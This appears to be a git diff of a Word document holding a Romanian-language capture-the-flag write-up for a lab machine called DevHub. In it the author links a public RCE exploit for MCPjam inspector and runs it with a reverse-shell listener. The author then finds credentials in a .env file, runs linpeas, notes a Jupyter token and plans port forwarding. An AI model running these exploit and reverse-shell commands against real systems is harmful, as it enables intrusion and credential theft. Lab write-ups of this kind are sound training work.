--- a/Medium/DevHub/exploit.docx
+++ b/Medium/DevHub/exploit.docx
@@ -515,30 +515,892 @@
         <w:bidi w:val="0"/>
         <w:jc w:val="start"/>
         <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:shd w:fill="auto" w:val="clear"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="start"/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:shd w:fill="auto" w:val="clear"/>
-        </w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+        <w:t>https://github.com/SrGinebras/CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="6">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="1445895"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="5" name="Image5" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="Image5" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="1445895"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+        <w:t>python3 CVE-2026-23744.py -u http://devhub.htb:6274/ -i 10.10.16.56 -p 4444</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>Am dat reverse shell. Acum, sa vedem daca luam ceva date sa ne putem conecta prin ssh.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>Am dat un ls -la si am vazut un .env ascuns in care erau cateva date.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="7">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="4328795"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="6" name="Image6" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="Image6" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="4328795"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>Timpul sa acceleream cautarea. Mia-m pus linpeas.sh sa fie mai rapid.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A fost un deadend. Dar, sunt efectiv neatent. DOAR MA UITAM PE SITE, parca era fix sub nasul meu urmatorul pas. Langa modul de intrare de pe portul 6274, fix langa, scrie MARE. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="8">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-45085</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>107950</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="3781425" cy="2809875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="7" name="Image7" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="7" name="Image7" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3781425" cy="2809875"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>In acest moment, eu sunt pe localhost. As putea sa il accesez. Dar cum? Ar fi ideal prin ssh. Inapoi la outputul de la linpeas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+        <w:t xml:space="preserve">══╣ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+        <w:t>Potential local forwarders/relays (T1049)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+        <w:t>mcp-dev    38442  0.0  0.0   3688  1064 ?        S    20:54   0:00 sed -E s,socat|ssh|-L|-R|-D|ncat|nc,.[1;31;103m&amp;.[0m,g</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Oare imi pot da forward prin mcp-dev?? Ala-s eu, si e acolo foarte tare ssh scris. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>Nimic.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>Din ce am folosit la facultate, jupyter nu e niciodata “Jupyter” ca si process, mereu e notebook, deci sa vedem procesul.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+        <w:t>ps aux | grep notebook</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="9">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="259080"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="8" name="Image8" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="Image8" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="259080"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>Avem si tokenul de la server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+        <w:t>a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="FFFF00" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:fill="auto" w:val="clear"/>
+        </w:rPr>
+        <w:t>Poate il putem folosi sa aflam mai multe. Din ce stim deja, noi avem acest proces pe portul 8888. Hai sa incerc sa ii dau port forward.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -548,6 +1410,7 @@
       <w:pgNumType w:fmt="decimal"/>
       <w:formProt w:val="false"/>
       <w:textDirection w:val="lrTb"/>
+      <w:docGrid w:type="default" w:linePitch="100" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
@@ -567,7 +1430,6 @@
     </w:rPrDefault>
     <w:pPrDefault>
       <w:pPr>
-        <w:widowControl/>
         <w:suppressAutoHyphens w:val="true"/>
       </w:pPr>
     </w:pPrDefault>
@@ -577,7 +1439,10 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
       <w:bidi w:val="0"/>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:jc w:val="start"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans"/>
